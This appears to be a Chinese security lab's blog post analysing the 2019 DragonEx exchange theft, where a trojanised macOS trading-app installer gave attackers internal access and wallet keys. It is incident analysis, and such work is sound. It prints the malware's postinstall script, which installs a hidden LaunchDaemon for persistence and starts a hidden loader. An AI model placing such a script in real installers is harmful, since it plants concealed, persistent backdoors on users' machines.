DragonEX交易所真相独家披露,降维安全实验室还原被盗全过程

96
降维安全实验室
2019.03.29 16:22 字数 371

事件

近日,DragonEx龙网交易所安全事件中,降维安全实验室(johnwick.io)第一时间与龙网积极取得联系,与龙网一起分析和确认,客服曾经从陌生人处获取并打开了一个Apple OS X下“交易软件”安装包WbBot.dmg (SHA256哈希****7DEC218E815A6EB399E3B559A8962EE46418A4E765D96D352335********),此安装包经降维安全实验室技术分析存在捆绑后门,黑客通过此安装包内后门获取内部人员权限渗透进内网进而成功获取数字货币钱包私钥。

分析

此dmg样本经过层层解包,最终层次结构如下:
在这里插入图片描述

其中的postinstall(绿色高亮)是后门的bash安装脚本,内容如下:

#! /bin/sh
mv /Applications/WbBot.app/Contents/Resources/.com.wbbot.plist /Library/LaunchDaemons/com.wbbot.plist
/Applications/WbBot.app/Contents/Resources/.loader PackageValidate &

可见,该后门本体就是位于WbBot.app/Contents/Resources/.loader(蓝色高亮行,SHA256哈希:****107c09f591a11e5e347acad5b47c70ff5d5641a01647854643e0********),

经过初步分析,确定为恶意后门

小结

降维安全实验室认为这是一次典型的专业级黑客攻击,降维安全实验室正在积极配合龙网追踪被盗资产,目前已经联系多家交易所,对被盗资产进行冻结处理,关于此事件的更深入分析请关注降维安全实验室的后续报告,同时提醒其他数字货币交易所以及个人用户提升安全意识并且采取必要的安全策略保护自身,不要轻易信任第三方用户。

日记本
Web note ad 1